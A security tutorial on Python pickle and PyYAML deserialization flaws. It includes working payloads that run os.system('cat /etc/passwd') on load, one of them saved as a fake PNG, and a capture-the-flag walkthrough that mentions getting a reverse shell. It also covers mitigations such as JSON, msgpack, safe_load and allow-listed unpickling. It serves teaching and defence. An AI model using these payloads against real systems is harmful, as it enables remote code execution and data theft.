Python Serialization Vulnerabilities – Pickle
Contents
Introduction
Serialization in Python
Serialization in Web Apps
Over Pickling
  Let's see a small example.
Python YAML vs Python Pickle
Mitigation
  JSON
  msgpack
Demonstration
Conclusion
Introduction
Serialization converts the data held in objects into a stream of bytes that can be written to disk or sent
over a network. The data can later be deserialized to recreate the original objects. Many programming
languages offer a way to do this, including PHP, Java, Ruby and Python (all common backend languages on the web).
Let's talk about serialization in Python. In Python, serialization with the pickle module is
called “pickling.”
Serialization in Python
In Python, pickle.dumps() serializes data and pickle.loads() deserializes it (pickling and unpickling).
For example, here is a list, pickled:
    $ python3
    >>> import pickle
    >>> variable = pickle.dumps([1,2,3])
    >>> print(variable)
    b'\x80\x04\x95\x0b\x00\x00\x00\x00\x00\x00\x00]\x94(K\x01K\x02K\x03e.'
    >>> pickle.loads(variable)
    [1, 2, 3]
As we can see above, printing the variable shows a byte string. This is serialization. Later,
pickle.loads(variable) deserializes the object.
This is helpful in many cases, for instance when we want to save some variables from a program to disk
as a binary file that other programs can use later. For example, let’s create a list and save it as a
binary file.
    import pickle

    variable = pickle.dumps([1,2,3])
    with open("myarray.pkl","wb") as f:
        f.write(variable)
As we can see, a pickle binary is now stored on the drive. Let's read it using pickle again.
    import pickle

    # Read the raw bytes back and deserialize them into a Python object.
    with open("myarray.pkl","rb") as f:
        obj = pickle.loads(f.read())
As you can see, we can now operate on the deserialized object (obj) just like a list again! During
development there may come a time when a developer wants to quit the IDE but keep the data and state
of all variables as they are at that moment; this is where pickling is helpful.
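As a rough sketch of that "save my session" idea, the snippet below stores several variables in one dictionary and restores them later. The variable names and the file name session_state.pkl are made up for illustration, and pickle.dump()/pickle.load() are used here as the file-based counterparts of dumps()/loads().

```python
import pickle
import tempfile
from pathlib import Path

# Hypothetical program state we want to keep between runs.
state = {"counter": 42, "names": ["alice", "bob"], "threshold": 0.75}

# Illustrative location; any writable path would do.
state_file = Path(tempfile.gettempdir()) / "session_state.pkl"

# pickle.dump() writes the serialized object straight to an open binary file.
with open(state_file, "wb") as f:
    pickle.dump(state, f)

# Later (for example in a new session), pickle.load() restores it.
# Only do this with files you created yourself.
with open(state_file, "rb") as f:
    restored = pickle.load(f)

print(restored == state)
```

This is fine for files that never leave your own machine; the rest of the article is about what happens when someone else controls the bytes.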
Serialization in Web Apps
If we want a user's information and some data to be retained the next time they interact with the server,
serialization is a natural fit. Just serialize some data, put it into a cookie (which takes up the user's
storage, not the server's) and, on the next request, deserialize it and use it on the site.
Pickle is used in Python web apps to do this. The caveat is that pickle deserializes unsafely while the
cookie's content is controlled by the client: it is possible to construct malicious pickle data which will
execute arbitrary code! Serialization in JSON is much safer. Unlike pickle, JSON doesn't allow executable
code to be embedded within the data, which eliminates this class of code injection vulnerability.
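To make the cookie scenario concrete, here is a minimal sketch of a cookie that carries JSON instead of a pickle. Since the client controls the cookie, the sketch also signs the payload with an HMAC so that tampering can be detected. The names SECRET_KEY, encode_cookie and decode_cookie are hypothetical and not taken from any framework; real applications would normally rely on their framework's signed-session support.

```python
import base64
import hashlib
import hmac
import json

# Hypothetical server-side secret; a real app would load it from configuration.
SECRET_KEY = b"change-me"

def encode_cookie(data: dict) -> str:
    """Serialize data as JSON and append an HMAC so tampering is detectable."""
    payload = base64.urlsafe_b64encode(json.dumps(data).encode("utf-8"))
    signature = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    return payload.decode("ascii") + "." + signature

def decode_cookie(cookie: str) -> dict:
    """Verify the signature first, then parse the JSON payload."""
    payload, _, signature = cookie.rpartition(".")
    expected = hmac.new(SECRET_KEY, payload.encode("utf-8"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(signature.encode("utf-8"), expected.encode("utf-8")):
        raise ValueError("cookie signature mismatch")
    # json.loads() can only ever produce dicts, lists, strings, numbers, booleans and None.
    return json.loads(base64.urlsafe_b64decode(payload))

cookie = encode_cookie({"user": "alice", "theme": "dark"})
print(decode_cookie(cookie))
```

Even if the signature check were missing, the worst an attacker could inject is unexpected data, not a callable to execute.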
Over Pickling
So far we have pickled well-known data types like a list. But what if we were to pickle our own
custom classes? Python can easily understand and deserialize built-in types, but what will it do with
custom classes such as connections to servers and other networking objects? It hardly makes
sense to serialize those, yet Python's developers added a way to pickle them too. Problems can arise
when Python tries to deserialize such objects.
Custom pickling and unpickling code can be used. When you define a class you can provide a mechanism
that states, 'here is what you should do when someone asks to unpickle you!' So when Python
unpickles this string of bytes, it may have to run some code to work out how to reconstruct the
object properly. The pickle file records which callable to invoke and which arguments to pass to it.
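Before looking at abuse, it may help to see the mechanism used as intended. The sketch below uses a hypothetical Connection class (not from the original article) whose live resource cannot be pickled, so it tells pickle how to rebuild it from its host and port instead.

```python
import pickle

class Connection:
    """Hypothetical stand-in for an object holding a live, unpicklable resource."""

    def __init__(self, host, port):
        self.host = host
        self.port = port
        self.socket = object()  # placeholder for a real socket

    def __reduce__(self):
        # Tell pickle: "to rebuild me, call Connection(host, port)".
        # Only a reference to the callable and its arguments go into the stream.
        return (Connection, (self.host, self.port))

data = pickle.dumps(Connection("example.com", 443))

# On load, pickle looks up Connection and calls it with the stored arguments.
clone = pickle.loads(data)
print(clone.host, clone.port)
```

The important point is that pickle.loads() calls whatever callable the stream names. Nothing forces that callable to be the object's own class.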
Here is a proof of concept. The code creates a class called EvilPickle. To support
pickling of a custom object, you define a method called "__reduce__" which returns a callable
and a tuple of arguments to call it with. Here, a simple "cat /etc/passwd" is run using the
os.system function. Finally, the pickle is written to a binary file called backup.data.
    import pickle
    import os

    class EvilPickle(object):
        def __reduce__(self):
            return (os.system, ('cat /etc/passwd', ))

    pickle_data = pickle.dumps(EvilPickle())
    with open("backup.data", "wb") as file:
        file.write(pickle_data)
The idea is to make whoever deserializes the file run cat /etc/passwd on their system. Let's try it out!
We save the above code as evilpickle.py and run it. Just to check, we cat the backup.data file, and we
can clearly see something fishy: the command string is readable inside the pickle.
The user deserializes it anyway and ends up printing their /etc/passwd file.
    import pickle

    # Unpickling runs the embedded os.system call; never do this with untrusted data.
    with open("backup.data","rb") as f:
        pickle.loads(f.read())
We can get even more nerdy and see what is happening under the hood by disassembling the pickle with
pickletools. Because the pickle was created on a Unix-like OS, os.system is recorded as posix.system:
the strings 'posix' and 'system' are pushed onto the stack as short strings (SHORT_BINUNICODE), and each
value is stored in the memo under successive indices starting at 0. The argument, 'cat /etc/passwd', is
wrapped in a one-element tuple (TUPLE1). The `REDUCE` opcode then calls the callable (typically a Python
function or method, here os.system) with that argument tuple. Finally, STOP ends the program.
The arguments returned by __reduce__ must be a tuple rather than a list. The primary difference between
the two is that tuples are immutable whereas lists are mutable: the contents of a tuple cannot change
once it has been created.
Note: the -a option makes pickletools annotate each opcode with a short description.
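The disassembly can also be reproduced from Python. The sketch below is an illustration rather than the exact session from the article: it swaps os.system for the harmless built-in len() (the Harmless class is hypothetical) and uses pickletools.genops() and pickletools.dis(), neither of which executes the pickle.

```python
import pickle
import pickletools

class Harmless:
    def __reduce__(self):
        # Benign stand-in for os.system: the built-in len() is called on load.
        return (len, ("hello",))

payload = pickle.dumps(Harmless())

# genops() only walks the opcodes, so it is safe to run on untrusted data
# (unlike pickle.loads()).
opcodes = [opcode.name for opcode, arg, pos in pickletools.genops(payload)]
print(opcodes)

# Annotated listing, similar to what "python -m pickletools -a <file>" prints.
pickletools.dis(payload, annotate=30)

# Loading the payload calls len("hello") and returns its result.
print(pickle.loads(payload))
```

Seeing REDUCE in the opcode list of a pickle you did not create is a strong hint that loading it will call something.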
Since the pickle object is user controlled and is unpickled on the server, the same technique can even be
used to get a remote shell on the server (by pickling a payload that opens a socket back to us and
submitting it to the server).
Until recently, PyTorch relied on pickle to serialize ML models, so loading an untrusted model could lead
to arbitrary code execution. The safetensors format overcomes this issue.
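Python YAML vs Python Pickle
Pickle is not the only offender: PyYAML can also construct arbitrary Python objects when an unsafe loader
is used.
    import yaml

    document = "!!python/object/apply:os.system ['cat /etc/passwd']"
    # Recent PyYAML versions require an explicit Loader; UnsafeLoader permits python/* tags.
    yaml.load(document, Loader=yaml.UnsafeLoader)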
This would also execute cat /etc/passwd. We can avoid this by using yaml.safe_load() instead of
yaml.load(): it only builds plain data types and rejects such tags.
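A quick way to convince yourself is to feed the same kind of document to the safe loader. This sketch assumes the third-party PyYAML package is installed and uses a harmless echo command in place of cat /etc/passwd; the command is never run.

```python
import yaml  # third-party PyYAML package

document = "!!python/object/apply:os.system ['echo pwned']"

try:
    yaml.safe_load(document)
    blocked = False
except yaml.YAMLError as exc:
    # The safe loader has no constructor for python/* tags, so it refuses the document.
    blocked = True
    print("rejected:", type(exc).__name__)

# Plain data still loads normally.
config = yaml.safe_load("name: demo\nports: [80, 443]")
print(config)
```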
Mitigation
Pickle is just one module in Python. This is a very well-known tool and developers use it still but if the
developers are a little more mindful, they’ll not ignore the warning shown below on pickle’s
documentation page:
JSON
    import json

    # Serialize
    data = {"key": "value"}
    json_data = json.dumps(data)

    # Deserialize
    deserialized_data = json.loads(json_data)
msgpack
    import msgpack

    # Serialize
    data = {"key": "value"}
    msgpack_data = msgpack.packb(data)

    # Deserialize
    deserialized_data = msgpack.unpackb(msgpack_data, raw=False)
Other safe options include Protocol Buffers (protobuf) by Google and CBOR.
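If pickle cannot be replaced, the pickle documentation describes a way to reduce the risk: subclass pickle.Unpickler and override find_class() so that only allow-listed globals can be loaded. The sketch below follows that idea. The ALLOWED_GLOBALS contents and the restricted_loads helper are illustrative assumptions, and an allow-list like this reduces the attack surface without making untrusted pickles safe in general.

```python
import io
import os
import pickle

# Hypothetical allow-list: (module, name) pairs the application is willing to load.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream asks for a global such as os.system.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data: bytes):
    """Like pickle.loads(), but refuses globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

class EvilPickle:
    def __reduce__(self):
        # Harmless command used only to show that the call is blocked.
        return (os.system, ("echo pwned",))

# Plain containers need no globals, so they load as usual.
print(restricted_loads(pickle.dumps([1, 2, 3])))

try:
    restricted_loads(pickle.dumps(EvilPickle()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```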
Demonstration
The target is a note-taking website that uses serialization. Here is what happens when
I submit a note with a PNG image.
After the server processes it, the note looks something like this. Observe that the URL renders a .pickle
file.
The challenge also provided the app.py source code, which reveals the background logic.
I can’t post the entire code, but here are some relevant snippets.
As we can see, the code accepts a title, content and image as an object, pickles it and stores it in
title.pickle:
1. The Note() class accepts an object new_note with 3 items: title, content, image_filename.
2. save_note() calls pickle.dumps() to pickle new_note. It also stores the image using image.save(),
a method of the uploaded file object that Flask provides. Similarly, image.filename gives the image's filename.
3. The secure_filename() function converts insecure names to secure ones. For example: note 1 becomes
note_1, and ../../../etc/passwd becomes etc_passwd.
4. unpickle_file loads the pickled file provided to it and unpickles it.
Here are some key takeaways about the functionality of the code:
1. The site accepts 3 key items.
2. It does not check whether the uploaded PNG is safe (that is, whether it is a valid PNG at all). This is
a good attack point.
3. All in all, the PNG upload is a strong candidate for smuggling in code because (a) the site doesn't
validate the PNG and (b) it will unpickle any file we provide.
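To illustrate the missing validation in takeaway 2, here is a minimal sketch of the kind of check the site could have made. It is not taken from the challenge's app.py; looks_like_png is a hypothetical helper that only compares the first bytes of an upload against the fixed 8-byte PNG signature.

```python
import pickle

# Every PNG file starts with this fixed 8-byte signature.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def looks_like_png(data: bytes) -> bool:
    """Cheap first-line check: does the upload start with the PNG signature?"""
    return data.startswith(PNG_SIGNATURE)

# A pickle stream renamed to evil.png still starts with pickle opcodes, not the PNG header.
fake_png = pickle.dumps({"title": "note", "content": "hello"})

# Start of a genuine PNG: the signature followed by the IHDR chunk header.
real_png_prefix = PNG_SIGNATURE + b"\x00\x00\x00\rIHDR"

print(looks_like_png(fake_png))
print(looks_like_png(real_png_prefix))
```

A signature check like this only raises the bar. The underlying flaw is point (b): the server should never unpickle a file that a user supplied.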
I tried a simple cat /etc/passwd command on my local machine, and the pickled evil.png file
deserialized properly!
    import pickle
    import os

    class EvilPickle(object):
        def __reduce__(self):
            return (os.system, ('cat /etc/passwd', ))

    pickle_data = pickle.dumps(EvilPickle())
    with open("evil.png", "wb") as file:
        file.write(pickle_data)
Let's take it a step further: set up a netcat listener and have the local deserialization of
evil.png connect back to it and give us a shell!
By following the same logic, we can exploit the server. First I create the PNG file and upload it to the
server.
The uploaded data becomes a pickle file stored on the server, and when it is requested, it is unpickled
and the result is visible on the screen.
This is how we root the box! Please note that I hid and altered a few details throughout the CTF section
of the article because the CTF is still an ongoing challenge and I couldn’t obtain permission to post a
complete solution.
Conclusion
Serialization vulnerabilities are easy to exploit and easy for developers to overlook, and they can lead to
arbitrary code execution on a machine. As we saw, when we deserialize untrusted data insecurely or use
insecure functions, we put our infrastructure at risk of compromise. Developers should read the
documentation carefully and not ignore its warnings. And finally, use data-only formats like JSON to
serialize and deserialize data, since they cannot contain executable code. Thanks for reading.